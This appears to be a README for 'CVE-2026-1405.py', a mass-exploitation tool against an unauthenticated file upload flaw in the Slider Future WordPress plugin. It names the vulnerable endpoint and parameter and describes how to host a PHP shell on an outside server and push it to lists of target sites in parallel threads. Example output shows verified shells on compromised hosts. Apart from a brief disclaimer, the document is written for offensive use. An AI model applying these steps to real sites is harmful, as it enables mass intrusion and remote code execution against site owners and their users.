# CVE-2026-1405
Slider Future &lt;= 1.0.5 - Unauthenticated Arbitrary File Upload
# 🚀 CVE-2026-1405.py — Slider Future Mass Exploit Tool

## 🩸 Vulnerability Overview

**Component:** Slider Future (WordPress plugin)  
**Affected Versions:** ≤ 1.0.5  
**Vulnerability:** Unauthenticated Arbitrary File Upload  
**CVE:** [CVE-2026-1405](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1405)  
**CVSS Score:** 9.8 (Critical)

The Slider Future plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `slider_future_handle_image_upload` function in all versions up to and including 1.0.5. This allows unauthenticated attackers to upload any file type—including malicious PHP shells—directly to the affected server, enabling remote code execution.

---

## ⚡ Exploit Features

- Mass exploitation across multiple targets.
- Uses the vulnerable endpoint: `/wp-json/slider-future/v1/upload-image/`
- Uploads a remote PHP shell via the `image_url` parameter (no authentication required).
- Automatically verifies shell execution by checking user-defined signatures.

---

## 🛠️ Usage Instructions

### 1. Prepare a text file containing your target WordPress sites (one per line):

```
http://example1.com
https://example2.com
...
```

### 2. Host your PHP shell online and have its direct URL ready.

Example: `http://yourserver.com/shell.php`

### 3. Run the script:

```bash
python3 CVE-2026-1405.py
```

You will be prompted for:
- **Targets file:** Path to your list of targets (default: `list.txt`)
- **Shell direct URL:** The online, accessible shell you want to upload to targets
- **Shell signature:** A unique string in your shell for verification (e.g. `Nxploited`)
- **Threads:** Number of parallel threads (default: 10)

### 4. Output

- Exploit results are shown live on a professional Rich-powered interface.
- Successful targets and shell URLs are automatically saved to `success_results.txt`.

---

## 📝 Script Details

- **Name:** CVE-2026-1405.py
- **Author:** Nxploited
- **Language:** Python 3
- **Libraries:** requests, rich

### How It Works

1. Sends a POST request to each target's vulnerable endpoint:
    - **URL:** `/wp-json/slider-future/v1/upload-image/`
    - **Parameter:** `image_url` pointing to your shell.
2. Parses the JSON response to extract the uploaded shell URL.
3. Visits the shell URL and searches for your signature string.
4. Displays status: success or failure for each target.

---

## ⚠️ Legal Disclaimer

This tool is for **educational and authorized security testing** purposes only.  
Unauthorized use against sites you do not own or have explicit permission to test is illegal.

---

## 💡 Example Output

```
Exploit For: CVE-2026-1405
By: Nxploited

Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited

2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt
```
